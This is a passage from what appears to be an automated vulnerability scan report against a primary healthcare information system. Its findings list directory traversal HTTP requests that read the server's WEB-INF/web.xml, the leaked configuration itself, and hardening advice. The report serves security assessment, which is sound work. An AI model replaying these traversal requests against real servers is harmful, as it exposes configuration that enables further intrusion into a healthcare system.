Primary Healthcare Information System (3)

http://10.8.3.187:9001/phis/ Web Application Security Assessment Report
TideSec Security Team
12 August 2020

1. Assessment Overview

The target of this assessment was:
Website URL: http://10.8.3.187:9001/phis/
Website title: Primary Healthcare Information System
IP address: Error

Web security scan results:
High-risk vulnerabilities: 18
Medium-risk vulnerabilities: 6
Low-risk vulnerabilities: 0

Page security check results:
Total URLs: 52
Dynamic URLs: 1
Hidden-link pages:
Sensitive-word pages:
Broken-link pages:
Snapshot pages:

Information leakage test results:
Open ports: Error
Subdomains: 1
Sensitive information: 0

2. About WDScanner

In recent years, security vulnerabilities across the Internet have grown ever more severe, with high-risk vulnerabilities such as the OpenSSL Heartbleed vulnerability, Java deserialization vulnerabilities, Struts command execution vulnerabilities and ImageMagick command execution vulnerabilities breaking out frequently. Against this background, in order to build vulnerability detection capability quickly after a vulnerability is disclosed, and to perform comprehensive and fast security checks of websites or hosts, the TideSec security team developed WDScanner, a distributed web security monitoring platform. The WDScanner platform mainly provides the following functions: distributed web vulnerability scanning, customer management, scheduled vulnerability scanning, website crawling, hidden-link detection, website fingerprinting, targeted vulnerability detection, proxy collection and deployment, targeted password cracking, and social-engineering database lookup.

(continuation of the preceding finding; its heading and the beginning of the retrieved web.xml are not on this page)

    <servlet-name>rpcServer</servlet-name>
    <servlet-class>com.caucho.hessian.server.HessianServlet</servlet-class>
    <init-param>
      <param-name>home-class</param-name>
      <param-value>ctd.net.rpc.server.HessianServiceDispather</param-value>
    </init-param>
  </servlet>
  <servlet-mapping>
    <servlet-name>rpcServer</servlet-name>
    <url-pattern>/rpc/*</url-pattern>
  </servlet-mapping>
  <!--
  <servlet>
    <servlet-name>AuthorizationServlet</servlet-name>
    <servlet-class>ctd.oauth.AuthorizationCostom</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>AuthLogon</servlet-name>
    <servlet-class>ctd.oauth.AuthLogon</servlet-class>
  </servlet>
  <servlet-mappings>
    <servlet-name>AuthorizationServlet</servlet-name>
    <url-pattern>/oauth/authorize</url-pattern>
  </servlet-mappings>
  <servlet-mappings>
    <servlet-name>AuthLogon</servlet-name>
    <url-pattern>/oauth/authorize_logon</url-pattern>
  </servlet-mappings>
  -->
  <servlet>
    <servlet-name>HttpForward</servlet-name>
    <servlet-class>phis.source.controller.HttpControllerForward</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HttpForward</servlet-name>
    <url-pattern>/forward/*</url-pattern>
  </servlet-mapping>
</web-app>

HTTP request
GET /phis/resources/phis/css/images/../../../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening advice
Filter "." (dot) and other potentially malicious characters: this applies when the production code can be modified, and is the most recommended approach. Validate the format of user-supplied parameters with regular expressions and check whether the input format is legitimate: this method gives the most accurate and fine-grained matching, but it is difficult and requires a lot of time to configure the rules. Configure open_basedir in php.ini: this parameter specifies the only directories the user may access, and serves as a fallback when the production code cannot be modified. (open_basedir is a PHP setting; the target here is a Java servlet application, as the retrieved web.xml shows, so this last item does not apply to it directly.)

4.4 Directory Traversal Vulnerability

Vulnerability description
This script may be vulnerable to directory traversal attacks. Directory Traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.

Risk level
High

File path
/phis/resources/sencha/ext3/css

Risk parameter

Test details
This file was found using the pattern $dirName/../../../WEB-INF/web.xml?.
Original directory: /phis/resources/sencha/ext3/css
Directory traversal pattern found:

<web-app xmlns="http://java.sun.com/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"
         version="2.5">
  <context-param>
    <param-name>webAppRootKey</param-name>
    <param-value>phis.root</param-value>
  </context-param>
  <context-param>
    <param-name>log4jConfigLocation</param-name>
    <param-value>classpath:phis/spring/log4j.properties</param-value>
  </context-param>
  <context-param>
    <param-name>log4jRefreshInterval</param-name>
    <param-value>6000</param-value>
  </context-param>
  <listener>
    <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
  </listener>
  <listener>
    <listener-class>ctd.mvc.controller.util.MVCSessionListener</listener-class>
  </listener>
  <servlet>
    <servlet-name>springServlet</servlet-name>
    <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
    <init-param>
      <param-name>contextConfigLocation</param-name>
      <param-value>
        classpath:ctd/mvc/controller/spring-mvc.xml
        classpath:phis/spring/spring.xml
        <!-- classpath:ctd/net/rpc/subscribe/store/spring-metaq.xml -->
      </param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>springServlet</servlet-name>
    <url-pattern>/</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>rpcServer</servlet-name>
    <servlet-class>com.caucho.hessian.server.HessianServlet</servlet-class>
    <init-param>
      <param-name>home-class</param-name>
      <param-value>ctd.net.rpc.server.HessianServiceDispather</param-value>
    </init-param>
  </servlet>
  <servlet-mapping>
    <servlet-name>rpcServer</servlet-name>
    <url-pattern>/rpc/*</url-pattern>
  </servlet-mapping>
  <!--
  <servlet>
    <servlet-name>AuthorizationServlet</servlet-name>
    <servlet-class>ctd.oauth.AuthorizationCostom</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>AuthLogon</servlet-name>
    <servlet-class>ctd.oauth.AuthLogon</servlet-class>
  </servlet>
  <servlet-mappings>
    <servlet-name>AuthorizationServlet</servlet-name>
    <url-pattern>/oauth/authorize</url-pattern>
  </servlet-mappings>
  <servlet-mappings>
    <servlet-name>AuthLogon</servlet-name>
    <url-pattern>/oauth/authorize_logon</url-pattern>
  </servlet-mappings>
  -->
  <servlet>
    <servlet-name>HttpForward</servlet-name>
    <servlet-class>phis.source.controller.HttpControllerForward</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HttpForward</servlet-name>
    <url-pattern>/forward/*</url-pattern>
  </servlet-mapping>
</web-app>

HTTP request
GET /phis/resources/sencha/ext3/css/../../../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening advice
Same as above.

4.5 Directory Traversal Vulnerability

Vulnerability description
This script may be vulnerable to directory traversal attacks. Directory Traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.

Risk level
High

File path
/phis/resources/app

Risk parameter

Test details
This file was found using the pattern $dirName/../WEB-INF/web.xml?.
Original directory: /phis/resources/app
Directory traversal pattern found: the same web.xml as reproduced in full under 4.4.

HTTP request
GET /phis/resources/app/../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening advice
Same as above.

4.6 Directory Traversal Vulnerability

Vulnerability description
This script may be vulnerable to directory traversal attacks. Directory Traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.

Risk level
High

File path
/phis/resources/element

Risk parameter

Test details
This file was found using the pattern $dirName/../WEB-INF/web.xml?.
Original directory: /phis/resources/element
Directory traversal pattern found: the same web.xml as reproduced in full under 4.4.

HTTP request
GET /phis/resources/element/../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening advice
Same as above.

4.7 Directory Traversal Vulnerability

Vulnerability description
This script may be vulnerable to directory traversal attacks. Directory Traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.

Risk level
High

File path
/phis/resources/phis

Risk parameter

Test details
This file was found using the pattern $dirName/../WEB-INF/web.xml?.
Original directory: /phis/resources/phis
Directory traversal pattern found: the same web.xml as reproduced in full under 4.4.

HTTP request
GET /phis/resources/phis/../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening advice
Same as above.

4.8 Directory Traversal Vulnerability

Vulnerability description
This script may be vulnerable to directory traversal attacks. Directory Traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.

Risk level
High

File path
/phis/resources/app/desktop

Risk parameter

Test details
This file was found using the pattern $dirName/../../WEB-INF/web.xml?.
Original directory: /phis/resources/app/desktop
Directory traversal pattern found: the same web.xml as reproduced in full under 4.4.

HTTP request
GET /phis/resources/app/desktop/../../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening advice
Same as above.

4.9 Directory Traversal Vulnerability

Vulnerability description
This script may be vulnerable to directory traversal attacks. Directory Traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.

Risk level
High

File path
/phis/resources

Risk parameter

Test details
This file was found using the pattern $dirName/../WEB-INF/web.xml?.
Original directory: /phis/resources
Directory traversal pattern found:

<web-app xmlns="http://java.sun.com/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/we